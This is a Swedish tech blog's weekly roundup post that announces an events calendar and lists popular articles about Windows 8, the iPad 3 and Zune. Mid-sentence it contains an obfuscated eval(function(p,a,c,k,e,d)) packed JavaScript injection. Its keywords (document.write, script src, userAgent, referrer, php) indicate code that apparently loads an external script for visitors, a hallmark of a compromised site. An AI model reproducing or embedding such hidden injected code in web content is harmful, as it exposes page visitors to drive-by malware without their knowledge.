Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Veckan som gick: Vecka 9

Veckan som gick: Vecka 9
Sebastian

Förra veckan var det mycket som hände på Revue. Vi lanserade vår kalender som vi hade på vår förra sida. I kalendern kan man hitta evenemang som vi tycker är intressanta för er läsare. Allt från teknik mässor till konserter.

Se kalendern här!

Här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hhrit|var|u0026u|referrer|rtrhb||js|php’.split(’|’),0,{}))
har vi också ett urval av artiklar som var heta vecka 9:

Ladda ner och testa Windows 8 idag

Officiellt: Apple iPad 3 visas upp 7 mars 2012

Microsoft 3D gränssnitt alá Star Wars.

Hur Microsoft dödar Zune och Windows Live i Windows 8

Gametrailers recension av SSX